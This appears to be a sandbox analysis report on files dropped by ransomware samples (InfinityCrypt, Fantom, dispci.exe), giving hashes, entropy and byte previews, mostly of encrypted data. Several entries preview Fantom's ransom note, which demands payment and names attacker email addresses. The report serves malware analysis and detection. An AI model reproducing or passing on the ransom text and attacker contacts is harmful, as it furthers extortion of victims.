                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):416
                                                                                                                                                Entropy (8bit):7.450250041645071
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:FVLpX7w/+xjprL7AHRJJwPHSfzbQ9QW3Ig9JqCKKflB9FP6lS1GA5M35lclZk+vu:vpX31LoQ2zbwQWzJ5KKfDSlqY8BN6h
                                                                                                                                                MD5:24A5DC2AC648D88EA210E4EB8392A265
                                                                                                                                                SHA1:ABA8E8B5AB9ABE57CAB9CDDA83F886109AAC06F6
                                                                                                                                                SHA-256:FB8221CC02FD2FCC71338ED0245ABBCE97D0D482E5549687945EB7F38070CBEB
                                                                                                                                                SHA-512:B7B53B1F65E309FED3E180F24565D02B760C1E0C99FE296D60F36F675481A8FA0D36B4C08BDA503FABF18969F8654C5AC8F5963BD574D4C3FC3D5B99B2F9F1A4
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.@.^c Hc<.oJ...pm.r+u..i.s.U...q.......P..;.r.O.y?.d[T.js3......u.Yj.7.ek....}....Pg$V....6^8.EjZ... ............r....`..@..x.....Fy.......3..~y..cFX....U...f.N...[W.g5...0.r....[..O'.E.......{..+.....0_^O...........b.Hh=U.._.q...w...U.. ..=2.. a)T.~.e+...M....$....._.|...6&.$`"....H.T.}....;.?...-...zQ..B...i"...R..yR.&.3..E|oE...\.O.....d.7&Z..-....w....8g..f.....aE.\...?..F.......5.5L....
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3440
                                                                                                                                                Entropy (8bit):7.939925785785191
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:oJOvR8aXVVNRbQjbSfDPdBeNnWv/oHki20xj6:u2/RbQjEloNU/u20xG
                                                                                                                                                MD5:0BC193750AF79E2343479F96DFC19432
                                                                                                                                                SHA1:9AC5951374E6007FBAEA42E81DBB2FA5DD4A5A68
                                                                                                                                                SHA-256:D3DE0A858B9B5CA8697199CC0E57AA12A3D966E665C65B00D8405CF2BB9B6773
                                                                                                                                                SHA-512:A8777A0C2CC4E79963F7830073EE6829508C564EFFBC19E69E5F536AD5425A2494BD71B9F17BF144DC3044D54D68796D068B0C82EDFC4E1BC74C0F5CCD641C99
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:..Fe3..I..a.+.9..1...U;4S.&:....(...h0*}....>..4....8..?W.!...{.ql:...',..>+6..Z.3`..u@......v..?......... .~..8.t....!?......5.2.......T\{|..J-!..6.?..$...,..u. .1..ztrk..E...+.v..~A".,l.... D......._...Y..?.T..):w.gq.j.)h.OL.......0d...v@/.0^[.s_.'.<..G{...:..r..9.*D$Gg.E...{.....0...}t..C..W.*.Xf...=...........oU..'C3?.c6..4T.....jg...u....$....O...&RF.....x.{..]..........+..2......V..Z..EY .._....2(.l.H.<.k.V,..s........E....Z..P..fH.I.......s...D*{*+3. ...|N3...c...+5i.j..A.../.P.XY.......S..7.T.ae-$..V..9...4.*+*.?....{.q..U..]..L....U.s.!.f"U....zCG..qi0T9.p....H0.W.g.<..8._.].1.d.....t..$.....(a.P.&|...*......:p..O..<.....9.m0.O...i........I..z2..".U.b.@NS..[....S...=O..s..\..&..w6...:....h..m..wNf.^.`..5x..K"oO........-i....0..|.W%..6....K.5i..Kp ......n.r..|.A.KP.`.io....{..N.JR.#..s...i}......,A...._#.....G....._......_'y.V.%...QO..%..X.....2..A...?...b...L".{.]d.........a..u........R..,.E..JpB.m..f.u....d.PN.V.hX..x.....q...
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):160
                                                                                                                                                Entropy (8bit):6.696059560591004
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:NHGJNvXIOjTflcTh8JtKHmz1j6/+6y1jyemMe75EJJG/pTagAcsa:NHEIylcOOHmz1G/3yq3wspaI7
                                                                                                                                                MD5:278CF27BF9EEE11AA4E65B96CFA9CE78
                                                                                                                                                SHA1:126697AB98FE5951CE61F0572D9E96FDA76C8E94
                                                                                                                                                SHA-256:9BB3B57369050314FF4CEA4E0058E8C683348D6A0CAD67E2EA1280C2DE753E14
                                                                                                                                                SHA-512:B18ABDF6F21F5754B29F055CD85473789187B9E144518145714B5A6CC40E6F25FC96939108A9DCCA29ECBEEFB7DB3FA6DE90240A35ACC9463594903FEDB5225A
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:..l....:.Y3.,`...ApDJ........{..a.l.@.n.N...=...0.....,...".g..q.>G@..;Dh..4.L.....A9pW..y."&...jY.C...\.....{-.T.w.<..,R...a-$..t...Z'7ja.?..f.c9l...
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2128
                                                                                                                                                Entropy (8bit):7.918481292864703
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:wcA04CggRMSVDL/yEgKqBFAQt3h/YSl7l0TwImc5XYpZ:wcgmMSVDL6EgKqrtGA50nmc5XYT
                                                                                                                                                MD5:16E5BD470149F61678A812CD5DE18701
                                                                                                                                                SHA1:65FA5BC881172521D59406AA613B04DDB8121170
                                                                                                                                                SHA-256:2E792DBFD634496F1BECC7C644D7E1D4218BFD8BF49FF0BAB3AF20977BF2BD9D
                                                                                                                                                SHA-512:80C7A310DF26C782F5F97A4F0D61DE449B350BDEE8B5F9720D5FC89084B6F3CFCE0DC808471C1B75287255E7A848D67A517EB0F0985BE87F3B75C9E5E60C0DF9
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:3.q.....!.$.kv.j.(...r.._.....Q8..N01.^O.7...0...3.....Jvl=..W.M..+b....,....8o?1...J..S..(..z$....2...V.....\.q>AV.n.....S..8...A.kG...E"...@(...h.J.1a..#.t....0.$.:..R...o...Y....b.YSD.........7...QUn.aS.p...{Y;.Q....A.....H...M..`.......w...~.y.*S\?w.....=..gE.B.D..P.....>3.v...A...|...ns...3...,r....v.x.> .....b'..2.j.~D.kr.....,.$Y*M....<fQb.Z..SL....."H.).?.%.G..<.5._.D......Z........=...d....l.=L._...B*.....7<(.F.../...r..M........X(@......22y..U?...`0.V4s..4X.qB...".'.....$.E\..t..N._[EqM...CI..p}c...FS.XK.x.y.U./.k..0..BA...=.+j..2A....y]..$S.8. .2.$.-..bE....I.vB.=Wv).t,.}... .1.v....."......N(z.4U...LE...'....C./.....i"........R[2..]..._.@......gu...../.y...-.......D..G....k.....|_.ci,.......Rw..PB. S$&7.../.#..T..n....K...J..^.. .......u.ZZ5,[0B..;...Q).c...Q.z...U..{.v.c..y.|.5.z....P.WB.qg..V?.e.&(..".}...9.Xp.3..)....C.Y........Hvg..H..]..Z....&&..t"]h..!z`x.Nd..c.5.$ .c=;.FG.....4.c9#`.. R..'....)g.%......H..n...N[..|W.I......j
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):448
                                                                                                                                                Entropy (8bit):7.498184464545955
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:NEHXLxHQTB6mYm5YZlnpSYsDfuU7zE8xAQsNtfx2Ndgun:NEHXFHQlzmlnYvfuyzRaQsN1Wgu
                                                                                                                                                MD5:EA52135F122F5226D664B9576D2D76D7
                                                                                                                                                SHA1:EEBD9BA5283CB416850D4A9FF4DE5F7E86D2AD6F
                                                                                                                                                SHA-256:25A97F9C53DB590CECF7141BC1C033FA8B24821DCDFD485E09A7319CFD53C7BC
                                                                                                                                                SHA-512:A8671CC8DC8F31637F1DBE4F5EDF2BC42DFF7BFC91675FE833469E275656ABCF1278003873BD8805A88160420363CE8E93CA5920F9AED6CC8DFE47B1AEC19C72
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:{1.&...D..I.......'Z....p.;.T..(..df......#.......'......\.S|..G...~..p...<6.S...u.xFJ.\*PYW..a8...9.>.(.........u.q..;.uC........h...S{.>.S%..........L.........'..8.{....L....W.....H.........hdU.......c.)..cO7...R..?k...B.......dU..cBy......O..)y..)....=.&..2e....!6.y.^...p..........M.c..K.......'....o...9.Mq..XN.d.:.v.(F...x).|U..../.......e....E7!&U....k.C....G..ZDB.S.S..........3U...Q...C...J......#_F}sQ..}.p...Yb
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:PGP Secret Sub-key -
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):400
                                                                                                                                                Entropy (8bit):7.435448394931011
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:x4/MCeqN5imKOjDtWOk/TZSHlszJvFdAbo6clMDTQpQEdSuIxPWRW1L2Cr6pRYcW:yLrLvL25zvmbozlMDEnexPWRWCRL+maN
                                                                                                                                                MD5:E0F2A9344871542C145230B62B68BFD6
                                                                                                                                                SHA1:74D125F2173617BF2C804A4C253A440DAC69A251
                                                                                                                                                SHA-256:E70A5C4BF3BE26D9DCD5EE2E4C5E4FDF903E4692731E42F62BB915C4C7E37566
                                                                                                                                                SHA-512:C969895F3FCE13044E9E525734B947F2517D7791F9339BE7F305E66C111B2B4F79DE8F873646CA51896DDD9E0382C26B1B0DFAB0B3AB8109FEA8739BDB41248D
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.9<sG.`........Aw....E72...+?]. .V.z.5?>.....4W+h3..R#...aF.....G>...k..'...fi..Q`.0L....\.W....|..G7.s.%JP.....J;G.......%|S.>.x...V..xw.m.........@..U....8.).d.`.C..0.Q.L.e....CV...uV5...Q...R..lHf&q..{..[...h.....a...L....=gF2.?")..~H..;5...9....m...j..>....w.R.;_.......zX.....6Pf.ynx."]Mb..,....:_...+6.#H.#...'p)Q....g.F..I..c'.....9.."w..Vw.{.....$.r..3;Qqy.V.._.}*..}8x].....i..
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:PGP Secret Sub-key -
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):544
                                                                                                                                                Entropy (8bit):7.6117938821667535
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:yLrLvL25zvmbMUh4R6UaCiTI7G4x1QeRJKPodX:yTvabUicU0TBcJKKX
                                                                                                                                                MD5:4BB855FA766E87A96280FAC24B74E520
                                                                                                                                                SHA1:D3BCFA614AA415E3641953DEABBDDFA37AC468AC
                                                                                                                                                SHA-256:BB04FB50535F1251A0A0274F6F20B4D86F078712BB5AA54C8C4C7A35CB0FF6E1
                                                                                                                                                SHA-512:1E7958D20C7CC7C24FE78404AE85B27368216BBE636F85E837A61255FA99582A064470AD09A18D7E5F9A69BE858E873A40A0129C11CDCCAFB384178F868F77C3
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.9<sG.`........Aw....E72...+?]. .V.z.5?>.....4W+h3..R#...aF.....G>...k..'...fi..Q`.0L....\.W....|..G7.s.%JP.....J;G.......%|S.>.x...V..xw.m.........@..U....8.).d.`.C..0.Q.c.O..A.v|7..2|....xl.>|..Q.....3!4.D.$..d.3.z.|...|1..Ec..L..#..rS........;.......j.9..}.[f......\EZ.\.:..QIb.`....-.[H.W.1...s....&.)..j.^.....G....'d...v..........$.]..v..........L....qk6....8O...6.._......./..p...Y...nm....J.>...0...aN..BY..}....zu.nS...aF.d...Q%.!e........yN.H_...NF<..r-..2..m\[.e..........C...H-.h.].......db..<....8.`..i...
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):14560
                                                                                                                                                Entropy (8bit):7.988067016504001
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:Wwjq+aFN6b67xpHhLZqcovVejlF/+IV5fEDQDtZ:Ww+R6bKfZe4jlIo58D8n
                                                                                                                                                MD5:E4A8388405402D449238FAB5D6F1BAA7
                                                                                                                                                SHA1:5360526BEACDE18397332ED817F12C733DFBB1DF
                                                                                                                                                SHA-256:641771AA7E365A2800322A0154D1F63DC2644BA80610C38BB458238D55C96A4D
                                                                                                                                                SHA-512:FECBE9DC04D9DF7C4CFC82CBAEB9400328AAC59D38DBA7BBC9B9E77D6F25DA2AAF5388C8419365E853240785C496F2DB5CDD0348C66528F7B2E479F4F2A80AD3
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:...Q+...,.`y.p..m)..Y.....k#...o..M..;.T...q......(.gb...5.P..//R1....~&L.\.U...4..`#y[`^..4...ym...BLJI...........:..2..|...O......=...C.i..w.....)ox...9U6.@.O...s.4t.q.~..t.u.(i.....c.-..y.._.....ut.>..[....(=....."./..9..f..s.M../..a6a......Fe.Kg.....p.....XH8..>I.]......r.a.Z8.&.e.*.+C8-.d....rd...o...mw+.\J..DH...+}....)_>.....h....p...`6g..fZ...E....4..o.I2N..9.B....|}....9n.+...y(F...l..T..[.CW..~.kd<f+..3...IIG.....k....Ku?o.Q.... ....8...B7P..R...2...vRY.$..Y.JEC...K.M.].)...9.7...5..~=.[.......\...v...~.*P....e. ...8.pw..V..YcAty|..XX.A..p.b..U4.}.l..K.3.,.....SF..@....Q......NQ..0..2.H,....]..S...4B.i..g..9.1....S.(>a.G..n...A..x.om....#.w......J..QZ.~.e@.5..<.....,...hr...>6..N...cs....GO.....&............:.l...Yv.sq...F./...Q_..(.T.axz.j.0.......?..5....q4l...6+O.o..../...~....=.}g3.XA..l...]Tq.o......{..ob.....}.r.|.$)H...0*...k^.!.........M.&..s....U7JZ5.b5...QX..q..C.b....f. ....O.&...{+N.......<.k...A...
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):431456
                                                                                                                                                Entropy (8bit):7.999604496269755
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:yd7+u0/qsHmMyzBvYYfiNPEp7myJMEKfskaWoHRNw/7pTqp1FzuaoY59FzW2uo:yotejfU8DNVNw/GzuJYT9uo
                                                                                                                                                MD5:4288BFDC6C636152A746DE77E0AA68CE
                                                                                                                                                SHA1:C4FD035F945358F6E8CFB34ED8F884F7081D7C05
                                                                                                                                                SHA-256:6A48B9B38610536A7DC8587E29396E0965EC41652171342809190D0DC6BE92C7
                                                                                                                                                SHA-512:8149745CF0D8EA175E175B948E211B77C297F03512AB341AF34C4403610EE49914766C5ADBD7192D84C4EA49EEC4DA5DCA7CA88D90826EE55D4C6AE511B275CB
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:...Q+...,.`y.p..m)..Y.....k#...o..M..;.T...q..'..r..T...|$U....D..8.^.n....s.m[W....p.Z.u...`.b@...kD.d..d.....<..^o.N.....s.y...3..<.....{A1...{...T..e...u....tw..4.T......*.$YW....CR..t..z....A..o....y....C'...xt...UH~....(.M...+@v..Qj.s"T...oQ8..4.....4....]./..)..A...jS..Ci..-Y._.6.....Q..Vn..S.v.Uc..8...W.D... ..Ju.......>.....92|....XlHJ7|..7.m.....u... .uk5>.-..L(.@...xKr..jh!.fYI.EY.C2...R2.^._.v..1..Jj4.+......q..#.....r....-..q.=...R.v.&.U..j/.T?)D.&.m...9. ?.D=..]X..P.Ux...~.E...R.p]I.<}g...o........37?...Aq.0[i..R..G..8...,..?.....c.8O.$.&fp.9.;.&...o....c7W...B.99...>;,R.v.z-...`.[.)....\.=....#...?`/s.U.bzS]......a9..z..D.3..\D.^.,.C^....;.3..x...T.x.....bI....].5`Lu.L...n.G..<.....]VT.k.n...V5.'.G6.7X..C@..&SJ.!.....J.o......Hx...V...q.n......mT_...N9kq|....F.N....=X...MpC......vTG...F...j\..;..!.2o,.tWB.y...H.m.D....%.......U....`.c....H.<..c<.xx...p.(....1.u.@4...;..ZM..o....p.....{.r.)~.9q&.x..\X..fV<..N=(F....../V.E...Sd
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe
                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1771
                                                                                                                                                Entropy (8bit):5.626804345531293
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Pz/aOxTpMreyR/xavHJZb50oEZUBeSc6kNfNvvTl8JOjnbMLDQR6FbXyZe:b/hppMGHPsUJif/8uYDm6wE
                                                                                                                                                MD5:DBF1AF9B57D59F28AFA5364E477A1907
                                                                                                                                                SHA1:FE3CD5358F08F352A87CA9859ED797513943440C
                                                                                                                                                SHA-256:9207E2E5562774B3650C467E4B79AD0AECA6B8F969328A2455D39820DC9BFE8B
                                                                                                                                                SHA-512:5CF49CF3E90684F554DD92AD12C8F57523C4BFC02B17D0FFB5BF4D31A861AABF14BAF6BEF9695B13403A54BA56819D67E5A5F9A89701D570BE9BDDCFD12379B7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:<html>..<head>..<style>..body{...background-color: #3366CC;...}.. h1 {.. background-color: RGB(249, 201, 16);.. }.. p {.. background-color: maroon; .. color: white;.. }... ..</style>..</head>....<body>...<center>...<h1><b> Attention ! All your files </b> have been encrypted. </h1></br>..<p>..Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br>..That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br>..Getting a decryption of your files is - SIMPLY task.</br></br>..That all what you need:</br>..1. Sent Your ID_KEY on mailbox fantomd12@yandex.ru or fantom12@techemail.com </br>..2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br>..3. Pay our services. </br>..4. GET software with passwords for decrypt you files.</br>..5. Make measures to prevent this type situations again.</br></br>..IMPORTANT(1)</br>..Do not try restore files without our help, this is useless, and
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe
                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1771
                                                                                                                                                Entropy (8bit):5.626804345531293
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Pz/aOxTpMreyR/xavHJZb50oEZUBeSc6kNfNvvTl8JOjnbMLDQR6FbXyZe:b/hppMGHPsUJif/8uYDm6wE
                                                                                                                                                MD5:DBF1AF9B57D59F28AFA5364E477A1907
                                                                                                                                                SHA1:FE3CD5358F08F352A87CA9859ED797513943440C
                                                                                                                                                SHA-256:9207E2E5562774B3650C467E4B79AD0AECA6B8F969328A2455D39820DC9BFE8B
                                                                                                                                                SHA-512:5CF49CF3E90684F554DD92AD12C8F57523C4BFC02B17D0FFB5BF4D31A861AABF14BAF6BEF9695B13403A54BA56819D67E5A5F9A89701D570BE9BDDCFD12379B7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:<html>..<head>..<style>..body{...background-color: #3366CC;...}.. h1 {.. background-color: RGB(249, 201, 16);.. }.. p {.. background-color: maroon; .. color: white;.. }... ..</style>..</head>....<body>...<center>...<h1><b> Attention ! All your files </b> have been encrypted. </h1></br>..<p>..Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br>..That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br>..Getting a decryption of your files is - SIMPLY task.</br></br>..That all what you need:</br>..1. Sent Your ID_KEY on mailbox fantomd12@yandex.ru or fantom12@techemail.com </br>..2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br>..3. Pay our services. </br>..4. GET software with passwords for decrypt you files.</br>..5. Make measures to prevent this type situations again.</br></br>..IMPORTANT(1)</br>..Do not try restore files without our help, this is useless, and
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe
                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1771
                                                                                                                                                Entropy (8bit):5.626804345531293
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Pz/aOxTpMreyR/xavHJZb50oEZUBeSc6kNfNvvTl8JOjnbMLDQR6FbXyZe:b/hppMGHPsUJif/8uYDm6wE
                                                                                                                                                MD5:DBF1AF9B57D59F28AFA5364E477A1907
                                                                                                                                                SHA1:FE3CD5358F08F352A87CA9859ED797513943440C
                                                                                                                                                SHA-256:9207E2E5562774B3650C467E4B79AD0AECA6B8F969328A2455D39820DC9BFE8B
                                                                                                                                                SHA-512:5CF49CF3E90684F554DD92AD12C8F57523C4BFC02B17D0FFB5BF4D31A861AABF14BAF6BEF9695B13403A54BA56819D67E5A5F9A89701D570BE9BDDCFD12379B7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:<html>..<head>..<style>..body{...background-color: #3366CC;...}.. h1 {.. background-color: RGB(249, 201, 16);.. }.. p {.. background-color: maroon; .. color: white;.. }... ..</style>..</head>....<body>...<center>...<h1><b> Attention ! All your files </b> have been encrypted. </h1></br>..<p>..Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br>..That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br>..Getting a decryption of your files is - SIMPLY task.</br></br>..That all what you need:</br>..1. Sent Your ID_KEY on mailbox fantomd12@yandex.ru or fantom12@techemail.com </br>..2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br>..3. Pay our services. </br>..4. GET software with passwords for decrypt you files.</br>..5. Make measures to prevent this type situations again.</br></br>..IMPORTANT(1)</br>..Do not try restore files without our help, this is useless, and
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe
                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1771
                                                                                                                                                Entropy (8bit):5.626804345531293
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Pz/aOxTpMreyR/xavHJZb50oEZUBeSc6kNfNvvTl8JOjnbMLDQR6FbXyZe:b/hppMGHPsUJif/8uYDm6wE
                                                                                                                                                MD5:DBF1AF9B57D59F28AFA5364E477A1907
                                                                                                                                                SHA1:FE3CD5358F08F352A87CA9859ED797513943440C
                                                                                                                                                SHA-256:9207E2E5562774B3650C467E4B79AD0AECA6B8F969328A2455D39820DC9BFE8B
                                                                                                                                                SHA-512:5CF49CF3E90684F554DD92AD12C8F57523C4BFC02B17D0FFB5BF4D31A861AABF14BAF6BEF9695B13403A54BA56819D67E5A5F9A89701D570BE9BDDCFD12379B7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:<html>..<head>..<style>..body{...background-color: #3366CC;...}.. h1 {.. background-color: RGB(249, 201, 16);.. }.. p {.. background-color: maroon; .. color: white;.. }... ..</style>..</head>....<body>...<center>...<h1><b> Attention ! All your files </b> have been encrypted. </h1></br>..<p>..Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br>..That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br>..Getting a decryption of your files is - SIMPLY task.</br></br>..That all what you need:</br>..1. Sent Your ID_KEY on mailbox fantomd12@yandex.ru or fantom12@techemail.com </br>..2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br>..3. Pay our services. </br>..4. GET software with passwords for decrypt you files.</br>..5. Make measures to prevent this type situations again.</br></br>..IMPORTANT(1)</br>..Do not try restore files without our help, this is useless, and
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe
                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1771
                                                                                                                                                Entropy (8bit):5.626804345531293
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Pz/aOxTpMreyR/xavHJZb50oEZUBeSc6kNfNvvTl8JOjnbMLDQR6FbXyZe:b/hppMGHPsUJif/8uYDm6wE
                                                                                                                                                MD5:DBF1AF9B57D59F28AFA5364E477A1907
                                                                                                                                                SHA1:FE3CD5358F08F352A87CA9859ED797513943440C
                                                                                                                                                SHA-256:9207E2E5562774B3650C467E4B79AD0AECA6B8F969328A2455D39820DC9BFE8B
                                                                                                                                                SHA-512:5CF49CF3E90684F554DD92AD12C8F57523C4BFC02B17D0FFB5BF4D31A861AABF14BAF6BEF9695B13403A54BA56819D67E5A5F9A89701D570BE9BDDCFD12379B7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:<html>..<head>..<style>..body{...background-color: #3366CC;...}.. h1 {.. background-color: RGB(249, 201, 16);.. }.. p {.. background-color: maroon; .. color: white;.. }... ..</style>..</head>....<body>...<center>...<h1><b> Attention ! All your files </b> have been encrypted. </h1></br>..<p>..Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br>..That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br>..Getting a decryption of your files is - SIMPLY task.</br></br>..That all what you need:</br>..1. Sent Your ID_KEY on mailbox fantomd12@yandex.ru or fantom12@techemail.com </br>..2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br>..3. Pay our services. </br>..4. GET software with passwords for decrypt you files.</br>..5. Make measures to prevent this type situations again.</br></br>..IMPORTANT(1)</br>..Do not try restore files without our help, this is useless, and
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):944
                                                                                                                                                Entropy (8bit):7.795427230975987
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:txLnesX3Ej/rs/+VFNNDkIdVw6xkNfVZdvs/nwuqPQUs:txLRKTs/+VFN1Xi6xkZVZG/wuqPk
                                                                                                                                                MD5:893800807E0CAC69E70F95E26F663ECC
                                                                                                                                                SHA1:0C41EB361A6E60726ECB874AF6EBC98627410BB6
                                                                                                                                                SHA-256:588EB09B91C3337C1B4F06473DA075BD9F3BD58E38C654C332E7605B3980BBCD
                                                                                                                                                SHA-512:ADC589F1A51ADA2A4402C32F4723B2E4448040121DB363F297667582203B949DBD05714ED655288A1F7B9049AB6AC0B66ADB331E8524363D515020E8EDEBE3C3
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.8....Mv....._....>.F\<...-A.x...T...-.Al... ..=..!.d..~{..hn..RL9s..u.q.t.w..~.L.....t{ov.A..c.Q.........E%.....-..J.l./.7...q.$.{1.Y.r.=y.....&G.j._."9.y.DO.....X9..rP.....7...".)..1...^.....AF..f..J..C...d...,W.f..I|.=9..xn.w.f.D.....Hq..:.k.Ba$..../F. .YV..x.In.7....+...j.P.n.r.RMT>.&vn..X..g-...R.]4p'...[..pQW..U....w.......C._..J. ..1.5..9..!.c..g....o.^ ..m........k.WA..(.4F.B..f..8....|5.b.Ac.V.X....Y.Z.._....m...S.@....._..~....0.s!*.n.I......"k..-1=...^E.....M..T...,d~..G.>|..<.'... ......Q.s..`.2.O.. ....4..R..o5......7...C.9....M..TTY`}.....]wp..1...t.....5dZ"C.3.....CkGZ..n.....+y.4V'{5~..G.05...D..s...O<.........O.i..U@0N......=I..i.....P.S.?..../.m...Z.....h..5S.A......o..{..H.$...#e..U..K..~....G..Aj;@r:..n3..h.Lq..P....{.......j'AY....(....Y.G.m.k.l"..E.....,py.fIQ.$...@.Vq&.J.!t\<a..*..(. ...S.P..,{..Q1$.`..Na...S+...4...r*RXEga..q...bE...Tf........lo.e......#
                                                                                                                                                Process:C:\Windows\dispci.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):57
                                                                                                                                                Entropy (8bit):2.062967662624547
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:/lEltfgnwT:yvT
                                                                                                                                                MD5:B5D2B9D74D52DAC47A3F3CB1D065305F
                                                                                                                                                SHA1:41A4742BC23F3A6FF61C60884604DA6448FFF274
                                                                                                                                                SHA-256:6359A4FCB0DABE70B88913A6A03CC21385459B8A924A6B3688A2E185C54DAAFA
                                                                                                                                                SHA-512:01EA77C5972D33494C10D6ADB47CB3F30EAC1AA4B93D6BAAFB75299AA99FED818A6275801BAAE92C18AC5D3C64443BB631A63C2B39B1B88BCD774218BB2B990F
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:........................................computer$.
